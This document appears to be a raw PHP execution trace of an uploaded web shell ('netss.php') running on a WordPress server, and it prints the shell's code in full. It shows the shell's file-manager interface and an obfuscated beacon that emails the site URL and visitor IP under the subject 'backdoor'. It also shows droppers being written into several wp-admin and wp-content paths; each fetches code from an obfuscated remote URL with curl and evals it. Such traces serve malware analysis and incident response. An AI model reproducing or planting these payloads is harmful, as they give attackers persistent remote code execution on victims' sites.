\'<td><a href="javascript:void(0);" onclick="acts(\\\'\' . $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n echo \'<td>\' . $ctime . \'</td>\';\n echo \'<td>\' . $mtime . \'</td>\';\n echo \'<td>-</td>\';\n echo \'<td><a href="javascript:void(0);" onclick="dels(\\\'\' . $name . \'\\\');">Del</a> \';\n echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n echo \'</tr>\';\n $dnum++;\n }\n foreach ($array[\'file\'] as $path => $name) {\n $prem = substr(decoct(fileperms($path)), -4);\n $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n $size = size(filesize($path));\n echo \'<tr>\';\n echo \'<td><input type="checkbox" name="files[]" value="\' . $name . \'"><a href="javascript:void(0);" onclick="go(\\\'edit\\\',\\\'\' . $name . \'\\\');">\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</a></td>\';\n echo \'<td><a href="javascript:void(0);" onclick="acts(\\\'\' . $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n echo \'<td>\' . $ctime . \'</td>\';\n echo \'<td>\' . $mtime . \'</td>\';\n echo \'<td align="right"><a href="javascript:void(0);" onclick="go(\\\'down\\\',\\\'\' . $name . \'\\\');">\' . $size . \'</a></td>\';\n echo \'<td><a target="_blank" href="\' . $thisurl . $name . \'">View</a> \';\n echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n echo \'</tr>\';\n $fnum++;\n }\n }\n unset($array);\n echo \'</table>\';\n echo \'<div class="actall" style="text-align:left;">\';\n echo \'<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> \';\n echo \'<input type="button" value="Copy" style="width:50px;" onclick=\\\'txts("Copy path","\' . $nowdir . \'","a");\\\'> \';\n echo \'<input type="button" value="Delete" style="width:50px;" onclick=\\\'dels("b");\\\'> \';\n echo \'<input type="button" value="Perm" style="width:50px;" onclick=\\\'txts("Change Permission","0666","c");\\\'> \';\n echo \'<input type="button" value="Time" style="width:50px;" onclick=\\\'txts("Change the time","\' . $mtime . \'","d");\\\'> \';\n echo \'Total dir[\' . $dnum . \'] - Total file[\' . $fnum . \'] - Permission[\' . $chmod . \']</div></form>\';\n break;\n}\n?>\n<div class="footag"><?php \necho php_uname() . \'<br>\' . $_SERVER[\'SERVER_SOFTWARE\'];\n?>\n</div></div></div></body></html><?php ${"\\x47\\x4cO\\x42\\x41\\x4c\\x53"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]="t\\x75j\\x75a\\x6em\\x61i\\x6c";${"\\x47L\\x4fB\\x41\\x4cS"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]="x\\x5fp\\x61\\x74h";${"\\x47L\\x4f\\x42A\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]="_\\x53E\\x52\\x56\\x45R";${"G\\x4cO\\x42\\x41\\x4c\\x53"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]="p\\x65\\x73\\x61n\\x5fa\\x6c\\x65r\\x74";@ini_set(\'output_buffering\',0);@ini_set(\'display_errors\',0);set_time_limit(0);ini_set(\'memory_limit\',\'64M\');header(\'Content-Type: text/html; charset=UTF-8\');${${"G\\x4cO\\x42A\\x4cS"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]}="l\\x6fg\\x6ed\\x61s\\x6du\\x40g\\x6da\\x69\\x6c.\\x63\\x6fm\\x2c\\x20n\\x64a\\x73\\x6d\\x75\\x77\\x68y\\x40y\\x61\\x68o\\x6f.\\x63\\x6f\\x6d";${${"G\\x4cO\\x42A\\x4cS"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]}="\\x68t\\x74p\\x3a/\\x2f".${${"G\\x4c\\x4f\\x42\\x41L\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'SERVER_NAME\'].${${"\\x47\\x4c\\x4f\\x42A\\x4cS"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REQUEST_URI\'];${${"\\x47L\\x4fB\\x41\\x4cS"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]}="\\x66\\x69\\x78\\x20${${"\\x47\\x4cO\\x42\\x41L\\x53"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]}\\x20\\x3a\\x70\\x20\\x2a\\x49\\x50\\x20\\x41\\x64\\x64\\x72\\x65\\x73\\x73\\x20\\x3a\\x20\\x5b\\x20".${${"G\\x4c\\x4fB\\x41\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REMOTE_ADDR\']."\\x20\\x5d";mail(${${"G\\x4c\\x4f\\x42\\x41L\\x53"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]},"backdoor",${${"G\\x4c\\x4fB\\x41\\x4cS"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]},"[ ".${${"\\x47\\x4c\\x4f\\x42A\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REMOTE_ADDR\']." \\x5d"); ?>\n<?php \nunset($array);\n' /var/www/html/uploads/netss.php 1 0
3 12 0 0.141720 970480 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'YXV0aF9sb2cucGhw'
3 12 1 0.141737 970560
3 12 R 'auth_log.php'
3 13 0 0.141753 970528 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 13 1 0.141767 970592
3 13 R 'w'
3 14 0 0.141780 970560 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 'auth_log.php' 'w'
3 14 1 0.141837 971200
3 14 R resource(5) of type (stream)
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $qosutldt0666f0acdeed = resource(5) of type (stream)
3 15 0 0.141870 971048 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'PD9waHA='
3 15 1 0.141884 971120
3 15 R '<?php'
3 16 0 0.141898 971088 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 resource(5) of type (stream) '<?php'
3 16 1 0.141922 971152
3 16 R 5
3 17 0 0.141936 971048 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+'
3 17 1 0.141960 971464
3 17 R ' $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 18 0 0.141986 971432 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 resource(5) of type (stream) ' $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 18 1 0.142010 971496
3 18 R 222
3 19 0 0.142024 971048 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 resource(5) of type (stream)
3 19 1 0.142040 970648
3 19 R TRUE
3 20 0 0.142053 970616 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'PD9waHAgJHBhc3N3b3JkPSI1MzFlNzBhNjc0NWQwN2E4YmVmYmQ3OWU1Y2M3ZTRjMSI7ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+'
3 20 1 0.142078 971096
3 20 R '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $ivxhezkq03c7c0ace395 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 21 0 0.142126 971064 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 21 1 0.142141 971144
3 21 R 'DOCUMENT_ROOT'
3 22 0 0.142156 971064 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWNvbnRlbnQvcmVnaWQucGhw'
3 22 1 0.142171 971152
3 22 R '/wp-content/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $yvpvnwdn0ba4439ee9a4 = '/var/www/html/wp-content/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $qqkgwotq1cb251ec0d56 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 23 0 0.142231 971128 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 23 1 0.142245 971192
3 23 R 'w'
3 24 0 0.142258 971160 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-content/regid.php' 'w'
3 24 1 0.142308 971232
3 24 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $cousnrmc7cef8a734855 = FALSE
3 25 0 0.142339 971128 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 25 1 0.142368 971192
3 25 R FALSE
3 26 0 0.142382 971128 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 26 1 0.142400 971160
3 26 R FALSE
3 27 0 0.142413 971128 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 27 1 0.142428 971208
3 27 R 'DOCUMENT_ROOT'
3 28 0 0.142443 971128 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL3JlZ2lkLnBocA=='
3 28 1 0.142457 971216
3 28 R '/wp-admin/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $iyaeksdve5058a61e226 = '/var/www/html/wp-admin/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $yodndfqd265246eadd25 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 29 0 0.142506 971192 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 29 1 0.142520 971256
3 29 R 'w'
3 30 0 0.142533 971224 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/regid.php' 'w'
3 30 1 0.142563 971296
3 30 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $pfiaytaxfbcd73a3e234 = FALSE
3 31 0 0.142589 971192 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 31 1 0.142617 971256
3 31 R FALSE
3 32 0 0.142630 971192 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 32 1 0.142647 971224
3 32 R FALSE
3 33 0 0.142660 971192 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 33 1 0.142675 971272
3 33 R 'DOCUMENT_ROOT'
3 34 0 0.142689 971192 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL2Nzcy9yZWdpZC5waHA='
3 34 1 0.142703 971288
3 34 R '/wp-admin/css/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $nbjydhey230cb5f15c1d = '/var/www/html/wp-admin/css/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $gpxyytua2a3def174022 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 35 0 0.142754 971256 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 35 1 0.142767 971320
3 35 R 'w'
3 36 0 0.142779 971288 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/css/regid.php' 'w'
3 36 1 0.142807 971360
3 36 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $akmclxsgc55520a111df = FALSE
3 37 0 0.142832 971256 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 37 1 0.142860 971320
3 37 R FALSE
3 38 0 0.142873 971256 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 38 1 0.142891 971288
3 38 R FALSE
3 39 0 0.142903 971256 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 39 1 0.142918 971336
3 39 R 'DOCUMENT_ROOT'
3 40 0 0.142936 971256 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL2pzL3JlZ2lkLnBocA=='
3 40 1 0.142951 971352
3 40 R '/wp-admin/js/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $zsvtagqw2b4b2dd2d7a2 = '/var/www/html/wp-admin/js/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $jiicqwlm48fa2467e5e6 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 41 0 0.143001 971320 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 41 1 0.143014 971384
3 41 R 'w'
3 42 0 0.143026 971352 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/js/regid.php' 'w'
3 42 1 0.143054 971424
3 42 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $wilbughyfb948f9d309f = FALSE
3 43 0 0.143080 971320 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 43 1 0.143108 971384
3 43 R FALSE
3 44 0 0.143121 971320 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 44 1 0.143138 971352
3 44 R FALSE
3 45 0 0.143151 971320 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 45 1 0.143166 971400
3 45 R 'DOCUMENT_ROOT'
3 46 0 0.143180 971320 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA=='
3 46 1 0.143195 971416
3 46 R '/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $bapepjtn2811cd9069a2 = '/var/www/html/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $xfauipebc39223eba07c = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 47 0 0.143245 971384 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 47 1 0.143258 971448
3 47 R 'w'
3 48 0 0.143271 971416 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/maint/regid.php' 'w'
3 48 1 0.143299 971488
3 48 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $rgezynep950ad7f8a5cf = FALSE
3 49 0 0.143325 971384 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 49 1 0.143353 971448
3 49 R FALSE
3 50 0 0.143366 971384 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 50 1 0.143387 971416
3 50 R FALSE
3 51 0 0.143400 971384 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 51 1 0.143414 971464
3 51 R 'DOCUMENT_ROOT'
3 52 0 0.143428 971384 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3JlZ2lkLnBocA=='
3 52 1 0.143442 971464
3 52 R '/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $xureceul40232fd6c8ad = '/var/www/html/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $oakpvexq994a8fc3f93e = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 53 0 0.143490 971432 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 53 1 0.143504 971496
3 53 R 'w'
3 54 0 0.143519 971464 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/regid.php' 'w'
3 54 1 0.143550 972000
3 54 R resource(6) of type (stream)
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $zlpoupzt5294fd239614 = resource(6) of type (stream)
3 55 0 0.143580 971896 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 resource(6) of type (stream) '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 55 1 0.143609 971960
3 55 R 273
3 56 0 0.143623 971896 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 resource(6) of type (stream)
3 56 1 0.143638 971488
3 56 R TRUE
3 57 0 0.143651 971456 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 57 1 0.143666 971536
3 57 R 'DOCUMENT_ROOT'
3 58 0 0.143680 971456 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL21haW50L2luZGV4LnBocA=='
3 58 1 0.143695 971552
3 58 R '/wp-admin/maint/index.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $prmotqdj3935cc34bef5 = '/var/www/html/wp-admin/maint/index.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $rtprfsmu3460f771bb99 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 59 0 0.143745 971520 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 59 1 0.143759 971584
3 59 R 'w'
3 60 0 0.143772 971552 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/maint/index.php' 'w'
3 60 1 0.143802 971624
3 60 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $fxiyhlfi40fbeaa2952a = FALSE
3 61 0 0.143828 971520 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 61 1 0.143856 971584
3 61 R FALSE
3 62 0 0.143869 971520 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 62 1 0.143887 971552
3 62 R FALSE
3 63 0 0.143900 971520 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 63 1 0.143914 971600
3 63 R 'DOCUMENT_ROOT'
3 64 0 0.143928 971520 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA=='
3 64 1 0.143944 971616
3 64 R '/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $mbjpypwb7b20acdddd89 = '/var/www/html/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $ytdsowai3effc6913c18 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 65 0 0.143993 971584 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 65 1 0.144007 971648
3 65 R 'w'
3 66 0 0.144020 971616 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/maint/regid.php' 'w'
3 66 1 0.144048 971688
3 66 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $uwadmcgaf32639c3fc76 = FALSE
3 67 0 0.144073 971584 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 67 1 0.144117 971648
3 67 R FALSE
3 68 0 0.144136 971584 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 68 1 0.144155 971616
3 68 R FALSE
3 69 0 0.144168 971584 error_reporting 0 /var/www/html/uploads/netss.php(1) : eval()'d code 3 1 1
3 69 1 0.144182 971624
3 69 R 0
3 70 0 0.144195 971584 ini_set 0 /var/www/html/uploads/netss.php(1) : eval()'d code 4 2 'display_errors' 'Off'
3 70 1 0.144211 971656
3 70 R ''
